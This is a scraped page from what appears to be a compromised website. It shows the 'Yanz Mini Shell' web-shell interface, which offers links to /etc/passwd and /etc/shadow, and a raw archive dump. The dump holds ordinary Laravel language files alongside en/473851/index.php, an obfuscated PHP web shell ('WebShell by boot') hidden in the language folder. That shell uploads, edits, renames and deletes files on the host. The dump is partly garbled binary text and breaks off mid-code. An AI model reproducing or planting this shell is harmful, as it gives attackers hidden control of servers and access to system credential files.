Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
admin
web
uyoxpress.com
public_html
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
PK ! ]��� � en/auth.phpnu �[��� <?php return [ 'failed' => 'These credentials do not match our records.', 'throttle' => 'Too many login attempts. Please try again in :seconds seconds.', ]; PK ! *sN, , en/passwords.phpnu �[��� <?php return [ 'reset' => 'Your password has been reset!', 'sent' => 'We have e-mailed your password reset link!', 'throttled' => 'Please wait before retrying.', 'token' => 'This password reset token is invalid.', 'user' => 'We can\'t find a user with that e-mail address.', ]; PK ! �Q�� � en/validation.phpnu �[��� <?php return [ 'accepted' => 'The :attribute must be accepted.', 'active_url' => 'The :attribute is not a valid URL.', 'after' => 'The :attribute must be a date after :date.', 'after_or_equal' => 'The :attribute must be a date after or equal to :date.', 'alpha' => 'The :attribute may only contain letters.', 'alpha_dash' => 'The :attribute may only contain letters, numbers, dashes and underscores.', 'alpha_num' => 'The :attribute may only contain letters and numbers.', 'array' => 'The :attribute must be an array.', 'attributes' => [ ], 'before' => 'The :attribute must be a date before :date.', 'before_or_equal' => 'The :attribute must be a date before or equal to :date.', 'between' => [ 'array' => 'The :attribute must have between :min and :max items.', 'file' => 'The :attribute must be between :min and :max kilobytes.', 'numeric' => 'The :attribute must be between :min and :max.', 'string' => 'The :attribute must be between :min and :max characters.', ], 'boolean' => 'The :attribute field must be true or false.', 'confirmed' => 'The :attribute confirmation does not match.', 'custom' => [ 'attribute-name' => [ 'rule-name' => 'custom-message', ], ], 'date' => 'The :attribute is not a valid date.', 'date_equals' => 'The :attribute must be a date equal to :date.', 'date_format' => 'The :attribute does not match the format :format.', 'different' => 'The :attribute and :other must be different.', 'digits' => 'The :attribute must be :digits digits.', 'digits_between' => 'The :attribute must be between :min and :max digits.', 'dimensions' => 'The :attribute has invalid image dimensions.', 'distinct' => 'The :attribute field has a duplicate value.', 'email' => 'The :attribute must be a valid email address.', 'ends_with' => 'The :attribute must end with one of the following: :values.', 'exists' => 'The selected :attribute is invalid.', 'file' => 'The :attribute must be a file.', 'filled' => 'The :attribute field must have a value.', 'gt' => [ 'array' => 'The :attribute must have more than :value items.', 'file' => 'The :attribute must be greater than :value kilobytes.', 'numeric' => 'The :attribute must be greater than :value.', 'string' => 'The :attribute must be greater than :value characters.', ], 'gte' => [ 'array' => 'The :attribute must have :value items or more.', 'file' => 'The :attribute must be greater than or equal :value kilobytes.', 'numeric' => 'The :attribute must be greater than or equal :value.', 'string' => 'The :attribute must be greater than or equal :value characters.', ], 'image' => 'The :attribute must be an image.', 'in' => 'The selected :attribute is invalid.', 'integer' => 'The :attribute must be an integer.', 'in_array' => 'The :attribute field does not exist in :other.', 'ip' => 'The :attribute must be a valid IP address.', 'ipv4' => 'The :attribute must be a valid IPv4 address.', 'ipv6' => 'The :attribute must be a valid IPv6 address.', 'json' => 'The :attribute must be a valid JSON string.', 'lt' => [ 'array' => 'The :attribute must have less than :value items.', 'file' => 'The :attribute must be less than :value kilobytes.', 'numeric' => 'The :attribute must be less than :value.', 'string' => 'The :attribute must be less than :value characters.', ], 'lte' => [ 'array' => 'The :attribute must not have more than :value items.', 'file' => 'The :attribute must be less than or equal :value kilobytes.', 'numeric' => 'The :attribute must be less than or equal :value.', 'string' => 'The :attribute must be less than or equal :value characters.', ], 'max' => [ 'array' => 'The :attribute may not have more than :max items.', 'file' => 'The :attribute may not be greater than :max kilobytes.', 'numeric' => 'The :attribute may not be greater than :max.', 'string' => 'The :attribute may not be greater than :max characters.', ], 'mimes' => 'The :attribute must be a file of type: :values.', 'mimetypes' => 'The :attribute must be a file of type: :values.', 'min' => [ 'array' => 'The :attribute must have at least :min items.', 'file' => 'The :attribute must be at least :min kilobytes.', 'numeric' => 'The :attribute must be at least :min.', 'string' => 'The :attribute must be at least :min characters.', ], 'not_in' => 'The selected :attribute is invalid.', 'not_regex' => 'The :attribute format is invalid.', 'numeric' => 'The :attribute must be a number.', 'password' => 'The password is incorrect.', 'present' => 'The :attribute field must be present.', 'regex' => 'The :attribute format is invalid.', 'required' => 'The :attribute field is required.', 'required_if' => 'The :attribute field is required when :other is :value.', 'required_unless' => 'The :attribute field is required unless :other is in :values.', 'required_with' => 'The :attribute field is required when :values is present.', 'required_without' => 'The :attribute field is required when :values is not present.', 'required_without_all' => 'The :attribute field is required when none of :values are present.', 'required_with_all' => 'The :attribute field is required when :values are present.', 'same' => 'The :attribute and :other must match.', 'size' => [ 'array' => 'The :attribute must contain :size items.', 'file' => 'The :attribute must be :size kilobytes.', 'numeric' => 'The :attribute must be :size.', 'string' => 'The :attribute must be :size characters.', ], 'starts_with' => 'The :attribute must start with one of the following: :values.', 'string' => 'The :attribute must be a string.', 'timezone' => 'The :attribute must be a valid zone.', 'unique' => 'The :attribute has already been taken.', 'uploaded' => 'The :attribute failed to upload.', 'url' => 'The :attribute format is invalid.', 'uuid' => 'The :attribute must be a valid UUID.', ]; PK ! en/index.phpnu �[��� PK ! �^W�4� 4� en/473851/index.phpnu �[��� <?php goto DU3KF; iM8Di: if (!is_dir($rR7IS . "\x2f" . $WODEV)) { goto E2Tr6; } goto zODrL; a32Aw: echo "\x3c\x64\151\x76\x20\x63\154\x61\x73\163\x3d\42\141\154\x65\162\164\x20\141\x6c\145\162\164\x2d\x73\x75\143\143\145\163\x73\x22\40\x72\157\154\x65\x3d\42\141\x6c\x65\162\164\42\x3e\xe4\277\xae\xe6\x94\271\346\x96\207\xe4\273\xb6\346\235\x83\351\x99\x90\xe6\210\220\345\x8a\237\x21\74\57\x64\x69\166\76"; goto MqVWM; B49ST: l3vVd: goto jquYe; Td1gf: goto uavKN; goto g4zNc; spMiC: $i9I5I = fopen($rR7IS . "\57" . $WODEV, "\x77"); goto z8qns; vkQD9: if (!($_POST["\141\143\x74"] == "\165\x70\154\x6f\141\144")) { goto NBGNA; } goto UNYFI; xwcKe: echo "\74\x64\x69\166\40\143\x6c\x61\x73\x73\x3d\x22\141\x6c\x65\x72\x74\40\141\154\145\x72\164\55\x64\141\156\147\x65\x72\42\40\162\x6f\x6c\145\75\x22\x61\154\145\x72\164\42\x3e\346\227\240\xe6\xb3\225\xe5\x86\231\xe5\205\245\xe6\x96\207\xe4\273\266\41\x3c\x2f\144\151\x76\76"; goto tNGN9; No7ER: echo "\x3c\144\151\166\40\143\154\x61\163\163\x3d\42\x61\154\145\x72\164\40\141\154\x65\162\x74\x2d\163\165\x63\143\x65\x73\163\x22\40\x72\x6f\x6c\145\75\42\x61\154\x65\162\164\x22\x3e\347\x9b\xae\345\275\225\xe5\x88\233\xe5\273\272\xe5\xa4\261\xe8\xb4\xa5\x21\x3c\x2f\x64\151\166\76"; goto wpPQi; V_UeI: $gwwRO = $ofUbe["\122\105\121\x55\105\x53\124\137\x53\x43\x48\x45\115\105"] . "\72\x2f\57" . $ofUbe["\x53\105\122\126\105\122\137\x4e\x41\115\105"]; goto eUo7K; EkUGc: error_reporting(0); goto Z8i4F; YFVK9: $KXLmd = rename($zNdcv, $rR7IS . "\57" . $o_Wzc); goto gwdz4; bbEbh: if ($Ys9sn == 6) { goto SmI32; } goto lvJsJ; Tsr1t: $RlY2U = fileperms($zNdcv); goto jSugX; u0Wod: zMrCb: goto EDa6D; JEB6r: if (!is_readable($rR7IS)) { goto PU3DU; } goto GPsdP; SHFhl: echo $zNdcv; goto iNkCv; qNE5i: qX2fL: goto UJCKR; K85ok: echo "\x3c\x64\x69\166\x20\143\154\x61\163\x73\75\x22\141\x6c\145\162\x74\40\x61\x6c\145\x72\164\x2d\163\165\x63\143\x65\x73\x73\x22\x20\162\157\x6c\x65\x3d\42\x61\154\145\162\x74\42\x3e\344\xbf\256\xe6\224\xb9\346\x96\207\xe4\273\266\xe5\206\x85\xe5\256\271\346\x88\220\xe5\212\237\x21\x3c\57\144\x69\166\x3e"; goto ZEoWb; xkK3U: if (!($c8aSu > 0)) { goto jooaI; } goto raFed; s3Z4T: $L05FZ = false; goto BZmW2; aJ5jw: echo "\42\76\15\xa\40\x20\40\x20\40\40\x20\40\x20\x20\x3c\57\x64\x69\x76\x3e\xd\xa\x20\x20\40\40\x20\40\x20\x20\40\x20\x3c\x62\x75\164\x74\157\156\40\x74\x79\x70\x65\75\x22\x73\x75\142\x6d\151\x74\42\x20\143\x6c\141\x73\x73\75\x22\142\x74\x6e\40\142\164\156\55\x73\x75\143\x63\145\163\x73\42\x3e\105\x64\151\164\74\x2f\x62\x75\164\x74\157\x6e\76\xd\xa\x20\40\40\40\x20\x20\40\40\x3c\57\x66\x6f\x72\155\76\15\12\40\40\x20\40\74\x2f\x64\x69\166\76\15\12\40\x20\x20\40"; goto X8nMx; YzL3X: wTzu4: goto xkK3U; YwnT9: Fmcx5: goto nvAUa; YwyqN: echo "\40\x20\74\144\x69\166\x20\x63\154\x61\x73\163\x3d\42\x72\157\x77\42\76\xd\12\x20\x20\40\40\x20\40\74\x64\x69\166\x20\143\x6c\141\x73\163\75\42\143\157\x6c\x2d\x31\x32\x22\40\163\x74\x79\154\145\75\x22\x6d\x61\x72\147\x69\x6e\55\x62\x6f\x74\164\157\x6d\x3a\40\61\162\x65\155\73\x22\76\15\12\x20\x20\x20\40\40\x20\x20\40\x3c\146\157\x72\155\x20\x61\x63\164\x69\157\x6e\75\42\77\160\x61\x74\150\75"; goto P9lkI; WZjES: echo "\46\x74\171\x70\x65\x3d\66\42\x3e\x43\162\145\141\164\145\x20\x46\151\x6c\145\74\x2f\141\x3e\xd\xa\x20\x20\x20\x20\x20\40\40\40\x20\x20\x20\x20\74\x61\40\x63\x6c\x61\x73\163\75\x22\142\x74\156\40\142\x74\156\55\x73\165\x63\143\x65\163\x73\40\x62\x74\156\55\x73\x6d\42\x20\150\162\145\146\75\x22\77\160\x61\164\150\75"; goto NbEdn; MaIvj: aYPGO: goto SY8zc; Uzbwl: $r5Ccu = 0; goto Nuyek; aoSAX: echo "\x3c\144\151\x76\40\143\154\x61\x73\x73\x3d\x22\141\154\x65\x72\164\x20\141\154\x65\x72\x74\55\163\x75\143\x63\x65\x73\x73\42\40\162\x6f\154\x65\75\42\x61\x6c\x65\162\164\x22\x3e\346\x96\x87\344\xbb\xb6\xe5\x88\x9b\xe5\xbb\272\xe6\210\x90\345\212\237\41\x3c\57\x64\151\166\x3e"; goto AHA3N; wQm_M: goto aYPGO; goto GurK2; sQeHU: echo "\42\x20\x6d\145\x74\x68\x6f\x64\75\x22\160\x6f\x73\164\42\x20\x65\x6e\143\x74\x79\160\x65\x3d\42\155\x75\154\164\x69\x70\141\162\164\57\146\x6f\162\x6d\55\x64\141\164\141\42\76\xd\xa\x20\40\40\x20\40\40\40\40\40\40\40\x20\x3c\x69\156\x70\x75\164\40\x74\x79\160\x65\x3d\42\x68\x69\144\x64\145\156\42\40\x6e\x61\x6d\145\x3d\x22\141\x63\164\42\x20\x76\x61\x6c\x75\x65\75\42\165\160\x6c\x6f\141\144\x22\57\x3e\15\xa\x20\40\x20\40\40\x20\40\40\x20\40\x20\x20\74\x69\x6e\x70\165\x74\x20\x63\x6c\141\x73\x73\75\x22\x66\157\162\x6d\x2d\143\x6f\156\x74\162\x6f\154\40\x66\157\x72\155\55\143\157\x6e\x74\162\x6f\x6c\x2d\x73\x6d\x22\x20\151\x64\x3d\x22\146\157\162\x6d\106\x69\x6c\145\123\x6d\42\40\x6e\x61\155\x65\75\x22\146\151\154\x65\124\157\x55\x70\x6c\157\x61\144\x22\x20\164\171\x70\x65\75\x22\x66\x69\x6c\x65\42\x20\163\x74\171\154\x65\75\x22\x77\x69\144\x74\x68\x3a\40\62\x30\x30\160\170\x3b\x64\x69\x73\x70\x6c\141\x79\x3a\40\151\x6e\x6c\x69\x6e\x65\55\x62\x6c\157\143\x6b\x3b\42\x3e\15\12\40\40\x20\x20\40\40\40\x20\40\x20\40\40\74\142\x75\164\164\157\156\x20\164\x79\x70\145\x3d\x22\163\165\x62\155\x69\x74\x22\x20\143\154\141\163\163\x3d\42\142\164\x6e\x20\142\164\156\x2d\x69\x6e\146\x6f\x20\x62\164\156\55\163\x6d\42\76\x55\x70\154\x6f\141\144\74\57\142\165\164\x74\157\156\x3e\xd\12\40\40\40\x20\x20\40\x20\x20\40\40\40\40\74\x61\40\143\154\x61\x73\163\x3d\42\142\x74\x6e\40\x62\x74\156\55\x70\x72\151\x6d\x61\162\x79\x20\142\164\x6e\55\163\x6d\x22\40\x68\x72\145\146\x3d\x22\77\x70\x61\x74\x68\75"; goto BIuLb; DlylI: if (fwrite($i9I5I, $D5vkg)) { goto Af00I; } goto xwcKe; UNYFI: $ciDD9 = $rR7IS . "\57" . basename($_FILES["\146\151\x6c\145\124\x6f\125\160\154\157\x61\x64"]["\156\x61\155\x65"]); goto PYBS_; o19uJ: T3iAH: goto wQm_M; bOSZE: if ($Ys9sn == 2 || $Ys9sn == 3) { goto hQiGT; } goto T99tA; w3I8z: echo $zNdcv; goto o4vjI; dKN9x: yRmp7: goto a32Aw; dvHij: echo "\x3c\57\x64\x69\166\x3e\xd\12\x3c\x73\x63\162\151\x70\164\x3e\xd\12\x20\40\x20\40\x24\50\x66\x75\x6e\143\x74\x69\x6f\156\50\x29\173\xd\12\40\40\x20\x20\x20\40\x20\x20\44\x28\x27\x23\141\x6c\154\143\150\145\143\153\47\x29\x2e\x63\x6c\x69\x63\x6b\x28\146\165\156\143\164\151\157\156\50\51\x7b\xd\12\40\x20\x20\40\x20\x20\40\40\40\40\40\x20\151\x66\50\x24\x28\x27\43\141\x6c\154\x63\150\145\x63\153\x27\x29\56\x69\163\50\42\x3a\x63\x68\145\143\153\145\x64\42\51\x29\x7b\15\xa\40\40\40\x20\40\40\40\40\x20\x20\40\40\40\x20\40\x20\44\x28\x27\151\x6e\x70\x75\x74\133\x6e\141\155\145\75\x22\143\x68\151\x6c\144\143\x68\x65\143\153\x5b\135\x22\x5d\47\x29\56\x65\141\x63\x68\x28\x66\x75\x6e\x63\x74\x69\157\156\50\51\173\15\12\40\x20\40\40\40\40\x20\40\40\x20\x20\x20\40\x20\40\40\40\40\x20\x20\x24\x28\164\x68\x69\163\x29\56\x61\x74\164\x72\x28\x27\143\x68\145\143\153\x65\x64\x27\54\x20\x74\162\165\145\x29\73\xd\xa\x20\x20\40\40\x20\40\40\40\40\x20\x20\x20\x20\40\40\x20\x7d\51\15\xa\40\x20\x20\x20\x20\40\40\40\x20\x20\40\x20\x7d\145\x6c\x73\x65\173\xd\12\x20\x20\x20\40\40\40\40\x20\x20\x20\40\40\x20\40\x20\x20\44\50\47\151\156\160\165\x74\133\156\141\155\145\x3d\42\x63\x68\x69\x6c\x64\x63\150\x65\143\153\x5b\135\x22\x5d\47\51\56\145\x61\143\x68\x28\x66\x75\156\x63\164\x69\157\x6e\x28\51\x7b\xd\xa\x20\x20\x20\x20\x20\40\x20\x20\x20\x20\x20\40\40\40\40\x20\40\x20\40\x20\44\x28\x74\150\151\163\x29\x2e\141\x74\164\x72\x28\x27\143\150\145\143\153\x65\x64\x27\x2c\x20\x66\141\x6c\163\145\x29\73\xd\12\x20\40\40\40\x20\40\40\x20\40\40\40\x20\40\x20\x20\40\175\x29\15\xa\x20\40\40\x20\40\x20\x20\40\40\x20\40\40\175\xd\xa\40\x20\40\x20\x20\x20\40\x20\175\51\xd\xa\40\x20\40\x20\175\51\xd\12\74\57\x73\x63\x72\x69\160\164\76\15\xa"; goto ip6t6; mg8p2: goto jGfN7; goto KpM1R; X8nMx: uavKN: goto Z_6AW; rWvP3: foreach ($nbt0K as $SU56i => $qMSGe) { goto pnUdL; zRz7z: goto xN1_3; goto Vj6SC; JWmyi: KMmt9: goto yoIWx; LcUYG: echo trim($qMSGe); goto S9cnU; wdiBm: echo "\40\x20\x20\x20\x20\x20\x20\40\x20\40"; goto JWmyi; pnUdL: echo "\40\40\40\x20\x20\x20\x20\40\x20\x20\x20\40"; goto EzbV_; Tyrcx: echo "\x22\x3e"; goto LcUYG; S9cnU: echo "\x3c\57\x61\x3e"; goto zRz7z; hU9Hq: echo $gs0lw; goto Tyrcx; Vj6SC: lurpk: goto rJa4i; rJa4i: echo "\x20\40\x20\40\x20\x20\40\40\40\x20\x20\x20\x3c\x61\x20\150\x72\x65\x66\75\x22\x3f\x70\141\164\x68\75\57\42\x3e\x2d\74\57\141\76\xd\xa\40\40\x20\x20\x20\40\x20\x20\40\x20\40\x20"; goto wI0bu; QdvkG: $thAHc = $qMSGe; goto rB4dj; iDLfJ: goto mbkXe; goto rrBHi; H21s1: echo "\x20\40\40\x20\x20\40\x20\40\40\x20\40\40\x20\40\40\40\x20\x20\x20\x20\x2f\74\x61\40\x68\x72\145\146\x3d\x22\77\x70\x61\164\150\x3d"; goto hU9Hq; wI0bu: xN1_3: goto wdiBm; wTiNS: $gs0lw = $gs0lw . "\57" . $qMSGe; goto H21s1; EzbV_: if (empty($qMSGe)) { goto lurpk; } goto l3kSH; rB4dj: mbkXe: goto wTiNS; rrBHi: EoXvA: goto QdvkG; l3kSH: if (empty($thAHc)) { goto EoXvA; } goto U062B; U062B: $thAHc = $thAHc . "\x2f" . $qMSGe; goto iDLfJ; yoIWx: } goto mp1Iy; eUo7K: if (empty($l7f3r)) { goto HJhIX; } goto uvvwC; I0vqC: p4sKm: goto DrOqJ; uj4VX: if (empty($P1sqQ)) { goto nhJ4J; } goto Uzbwl; z5lhs: echo "\40\x20\x20\x20\40\40\x20\40\40\40\x20\x20\74\164\145\170\x74\x61\x72\145\x61\40\143\x6c\141\163\163\75\x22\x66\x6f\x72\155\55\143\157\156\x74\162\x6f\154\x22\40\151\x64\75\x22\145\x78\141\x6d\x70\154\145\106\x6f\162\155\103\157\x6e\x74\x72\157\x6c\x54\145\x78\x74\141\162\x65\141\61\42\x20\156\x61\x6d\x65\x3d\x22\x66\151\x6c\145\137\x63\157\x6e\164\x65\156\164\x22\x20\162\157\x77\x73\75\x22\62\60\42\40\143\157\x6c\163\75\42\61\60\x30\42\76"; goto ndhOW; Ff6Uv: echo "\40\40\x20\40\x3c\x64\151\x76\x20\x63\154\x61\x73\x73\x3d\42\162\x6f\x77\42\x3e\15\xa\x20\40\40\40\x20\x20\x20\40\74\x66\x6f\x72\x6d\40\x61\143\164\x69\157\x6e\75\42\x3f\x74\171\x70\145\75\64\x22\x20\x6d\145\164\x68\157\144\x3d\42\160\157\x73\164\42\x3e\15\xa\40\40\x20\40\x20\40\x20\x20\x20\x20\x3c\151\x6e\160\165\x74\40\164\171\x70\145\x3d\x22\150\x69\x64\144\145\156\x22\40\x69\x64\x3d\42\160\141\164\x68\x22\x20\x6e\141\155\145\x3d\x22\160\x61\164\x68\42\x20\x76\141\154\x75\x65\x3d\42"; goto BqCBI; inQAA: fclose($i9I5I); goto I0vqC; olCkt: cyTPM: goto DlylI; vdHOS: xeKSD: goto FGnye; g4zNc: dxewi: goto RPYLT; Ww28C: $gs0lw = ''; goto rWvP3; GurK2: SmI32: goto uxVzD; BIuLb: echo $zNdcv; goto WZjES; T99tA: if ($Ys9sn == 4) { goto dxewi; } goto h3CAh; O1E2I: echo "\x22\40\x70\154\x61\143\145\x68\157\154\x64\145\162\75\x22\x4e\x65\x77\40\106\x69\154\x65\x20\116\x61\x6d\145\42\x3e\xd\xa\40\x20\40\x20\40\x20\x20\x20\40\x20\x3c\57\144\151\x76\76\xd\xa\40\x20\x20\x20\x20\40\x20\x20\x20\40\74\x64\x69\166\x20\143\154\141\163\x73\75\x22\x66\157\162\x6d\x2d\x67\162\157\x75\160\x22\x3e\xd\xa\x20\x20\x20\x20\x20\40\40\40\x20\x20\40\x20\x20\x3c\x74\145\170\x74\x61\162\x65\x61\x20\143\x6c\141\163\x73\x3d\x22\146\x6f\162\x6d\55\x63\x6f\x6e\164\x72\x6f\154\x22\x20\x69\144\x3d\42\156\145\x77\x5f\x63\x6f\156\164\145\156\x74\x22\40\x6e\x61\155\145\75\42\x6e\145\x77\137\x63\x6f\156\164\x65\156\164\x22\40\x72\x6f\167\163\75\x22\62\60\x22\40\143\157\x6c\163\x3d\x22\x31\60\60\42\40\160\x6c\x61\x63\145\150\157\x6c\144\145\162\x3d\x22\x4e\145\167\x20\x46\x69\x6c\145\40\x43\157\x6e\x74\x65\x6e\x74\x22\x3e"; goto TUDA6; uyeUY: echo "\x22\40\155\145\164\150\x6f\144\x3d\42\160\157\163\164\x22\x3e\xd\12\40\40\40\40\x20\x20\x3c\144\151\x76\40\143\154\x61\163\163\x3d\x22\x63\x6f\x6c\x2d\x31\x32\42\40\x73\164\x79\154\145\75\x22\155\x61\162\x67\151\156\x2d\142\x6f\x74\x74\157\x6d\72\x20\x31\x72\x65\x6d\73\42\x3e\15\xa\40\x20\40\40\x20\x20\x20\x20\74\x69\156\x70\x75\x74\x20\x74\171\160\x65\75\x22\x68\x69\144\144\145\x6e\x22\x20\x6e\x61\x6d\145\75\42\141\x63\x74\x22\x20\x76\141\154\x75\145\x3d\42\144\145\154\42\57\x3e\xd\xa\x20\40\40\x20\40\x20\x20\x20\74\142\x75\164\164\157\x6e\x20\164\171\x70\x65\x3d\42\x73\x75\x62\155\151\x74\x22\40\x63\154\141\163\163\75\42\142\164\156\x20\x62\x74\156\55\144\141\156\147\145\x72\40\142\164\x6e\55\170\163\42\x3e\x44\x65\154\145\164\145\74\x2f\x62\x75\x74\164\157\x6e\76\15\12\x20\x20\40\40\x20\40\74\57\144\x69\166\x3e\xd\xa\40\40\40\40\x20\40\74\164\x61\142\x6c\x65\x20\143\x6c\x61\x73\x73\75\x22\x74\141\142\154\145\x20\x74\x61\x62\154\145\55\x62\157\x72\144\x65\162\145\144\x22\76\15\xa\40\x20\40\x20\x20\x20\40\x20\74\164\150\x65\x61\x64\x3e\15\12\40\x20\x20\40\x20\x20\40\x20\x20\40\74\164\x72\76\xd\xa\x20\40\x20\40\x20\40\40\x20\40\40\40\x20\x3c\164\x68\76\xd\12\x20\x20\40\x20\40\40\x20\40\40\40\40\x20\40\x20\x20\40\x3c\144\x69\166\x20\143\x6c\141\163\x73\x3d\x22\146\157\162\155\55\x63\x68\x65\143\x6b\42\76\15\12\x20\40\40\x20\x20\x20\x20\40\40\40\40\40\40\40\40\40\x20\x20\74\x69\x6e\160\165\x74\40\143\x6c\141\163\163\75\x22\146\157\x72\x6d\55\x63\150\145\x63\x6b\x2d\151\x6e\x70\165\164\x22\x20\x74\171\x70\145\x3d\42\143\x68\x65\143\x6b\x62\157\170\x22\40\166\141\154\165\x65\x3d\42\61\x22\40\x69\144\x3d\42\x61\x6c\x6c\143\150\x65\143\153\42\x20\x6e\x61\155\145\x3d\42\141\x6c\x6c\143\150\145\x63\x6b\x22\76\xd\xa\40\40\40\40\x20\40\x20\x20\x20\x20\x20\x20\40\40\x20\x20\74\57\144\151\x76\76\xd\xa\x20\x20\x20\40\40\40\x20\40\x20\40\x20\x20\74\x2f\x74\x68\x3e\x20\x20\15\12\x20\40\40\x20\40\x20\x20\40\x20\40\40\x20\74\x74\x68\x3e\116\x61\155\145\74\x2f\164\150\x3e\15\xa\x20\x20\x20\x20\x20\40\40\40\x20\40\40\x20\x3c\164\x68\76\x55\162\x6c\x3c\57\x74\x68\x3e\xd\xa\40\40\40\40\x20\x20\x20\40\x20\x20\40\x20\74\x74\x68\x3e\x53\x69\172\x65\x3c\57\x74\x68\76\15\xa\x20\40\x20\x20\x20\x20\40\40\x20\x20\40\x20\74\164\150\76\x4d\x6f\144\151\146\x79\x3c\x2f\164\150\76\xd\xa\x20\x20\40\x20\40\x20\x20\40\40\40\x20\x20\x3c\x74\x68\76\120\145\162\155\x69\163\163\151\x6f\x6e\74\x2f\164\150\x3e\15\12\40\x20\40\40\40\40\40\40\x20\40\x20\40\x3c\x74\150\x3e\x41\x63\x74\x69\x6f\x6e\x3c\x2f\164\150\76\xd\xa\x20\x20\x20\40\40\40\40\40\x20\40\x3c\x2f\164\162\76\15\12\40\40\40\40\40\x20\40\40\74\x2f\164\x68\145\141\x64\x3e\15\xa\x20\x20\x20\x20\x20\x20\40\40\74\164\x62\157\144\x79\x3e\xd\xa\40\40\40\40\40\40\40\x20\x20\40"; goto h7_9t; FGnye: echo "\x20\40\40\x20\x3c\144\x69\x76\40\x63\154\141\163\163\x3d\x22\162\157\167\x22\76\15\xa\x20\40\x20\40\40\40\40\40\74\146\157\x72\x6d\40\141\143\164\x69\x6f\156\75\42\77\x74\x79\x70\x65\x3d\65\42\x20\x6d\145\x74\150\157\144\x3d\x22\x70\x6f\x73\x74\42\x3e\xd\xa\40\x20\40\x20\x20\x20\x20\40\40\x20\74\x69\x6e\160\x75\164\x20\x74\x79\160\145\x3d\x22\x68\x69\x64\144\145\156\x22\x20\x69\x64\75\x22\x70\x61\164\150\x22\x20\x6e\x61\155\145\75\42\160\x61\164\150\x22\40\166\141\x6c\x75\x65\75\x22"; goto SHFhl; KTTG5: $rR7IS = $l7f3r; goto mTTPR; oXatu: echo "\74\x21\x44\117\103\124\131\x50\x45\x20\x68\164\155\x6c\76\15\12\74\150\164\x6d\154\40\x6c\141\x6e\x67\75\x22\145\x6e\42\x3e\xd\12\x3c\x68\145\x61\x64\x3e\xd\xa\40\40\x3c\164\x69\x74\x6c\x65\x3e\127\145\142\123\x68\145\154\x6c\40\142\171\40\142\157\157\x74\74\57\164\151\164\x6c\145\76\xd\12\40\40\x3c\x6d\x65\164\x61\x20\x63\150\x61\x72\163\145\164\x3d\x22\x75\164\x66\x2d\70\42\x3e\15\xa\40\40\74\x6d\145\164\x61\40\x6e\x61\x6d\145\x3d\x22\x76\151\x65\167\160\157\162\164\x22\x20\x63\157\156\x74\145\x6e\x74\75\42\167\151\x64\x74\x68\x3d\144\x65\166\x69\143\145\55\x77\151\x64\164\x68\54\40\151\156\151\164\151\x61\154\x2d\x73\143\141\x6c\x65\75\61\x22\76\xd\xa\x20\40\x3c\x6c\x69\156\x6b\x20\162\145\154\x3d\42\x73\x74\x79\x6c\145\163\x68\x65\x65\164\42\x20\150\162\145\146\x3d\x22\150\x74\x74\160\163\72\x2f\57\x6d\x61\x78\143\144\156\56\142\157\x6f\x74\x73\164\162\141\160\143\x64\156\x2e\x63\x6f\x6d\57\142\157\157\164\163\164\x72\x61\x70\x2f\x33\56\64\x2e\x31\57\x63\163\163\x2f\142\157\157\164\163\164\162\x61\160\56\x6d\151\x6e\56\143\163\x73\42\76\xd\12\x20\x20\x3c\x73\143\x72\151\x70\x74\x20\x73\x72\143\x3d\42\x68\164\x74\x70\163\72\x2f\57\x61\x6a\x61\x78\x2e\147\x6f\157\x67\x6c\x65\x61\x70\x69\x73\x2e\143\x6f\155\57\x61\152\141\170\x2f\x6c\x69\142\163\x2f\x6a\x71\x75\x65\x72\171\57\63\56\x37\x2e\x31\57\152\161\x75\145\162\171\x2e\x6d\x69\x6e\x2e\152\x73\42\76\74\57\163\143\162\x69\x70\164\x3e\xd\xa\x20\x20\x3c\163\143\x72\151\x70\x74\x20\163\x72\x63\75\42\x68\164\x74\160\163\72\x2f\x2f\x6d\x61\x78\x63\x64\x6e\56\x62\x6f\x6f\164\163\164\x72\141\160\143\144\156\56\x63\157\155\57\142\157\157\164\163\x74\162\141\x70\57\x33\56\x34\x2e\x31\57\x6a\163\57\142\x6f\x6f\x74\163\x74\162\x61\x70\x2e\x6d\151\x6e\56\152\163\42\x3e\74\x2f\163\x63\162\x69\x70\x74\76\xd\xa\x3c\x2f\150\x65\141\144\76\15\12\x3c\142\x6f\144\171\76\15\12\x3c\x64\151\x76\x20\x63\x6c\x61\163\x73\75\x22\x6a\165\x6d\142\x6f\164\x72\157\x6e\x20\x74\x65\x78\x74\55\x63\145\x6e\164\145\x72\x22\x20\x73\164\171\154\x65\75\42\160\141\x64\x64\x69\x6e\x67\72\x20\61\162\x65\x6d\40\60\x72\145\x6d\73\42\76\15\xa\40\40\74\x68\x31\x20\163\164\x79\x6c\x65\x3d\42\x66\x6f\x6e\164\x2d\x73\151\172\x65\x3a\62\162\x65\155\x3b\146\157\x6e\x74\55\167\x65\x69\x67\x68\x74\72\x20\142\x6f\x6c\144\73\x6d\x61\162\147\x69\156\x3a\x20\x31\x72\145\155\40\x30\73\x22\x3e\x57\x65\x62\x53\150\145\154\x6c\x20\142\x79\x20\142\157\157\x74\x3c\57\x68\61\76\xd\xa\x3c\57\144\151\x76\76\15\12\x3c\x64\151\x76\40\x63\x6c\x61\163\x73\75\42\143\157\x6e\164\141\x69\x6e\145\162\x22\x3e\15\xa\x20\40\x3c\x64\x69\166\40\143\154\141\163\163\75\42\162\x6f\167\42\x3e\15\xa\x20\x20\x20\40\x20\x20\74\160\76\x53\145\x72\x76\145\x72\40\111\x50\x3a\x20"; goto cjP0N; wW3Q9: lLSby: goto rj9ra; rVdWT: echo "\x22\76\x50\x72\x6f\x6a\x65\x63\164\x3c\x2f\x61\76\xd\xa\40\40\40\40\x20\40\x3c\57\160\76\xd\12\x20\40\x3c\x2f\144\x69\x76\x3e\15\12\x20\40\74\144\x69\x76\x20\x63\x6c\141\163\x73\75\x22\162\157\x77\42\x3e\15\xa\40\40\40\x20\x20\40\74\160\x3e\xd\12\x20\x20\40\x20\x20\x20\40\x20\40\40\120\x61\164\x68\72\x20\15\xa\x20\x20\x20\x20\40\x20\40\x20\40\40"; goto Ww28C; DU3KF: @set_time_limit(0); goto EkUGc; GPsdP: $cFYjf = true; goto KEhT5; DrOqJ: goto SzLxJ; goto l8rz4; NbEdn: echo $zNdcv; goto P9mg3; EBf_x: echo $WODEV; goto pOYOs; Nt0A3: hyBKU: 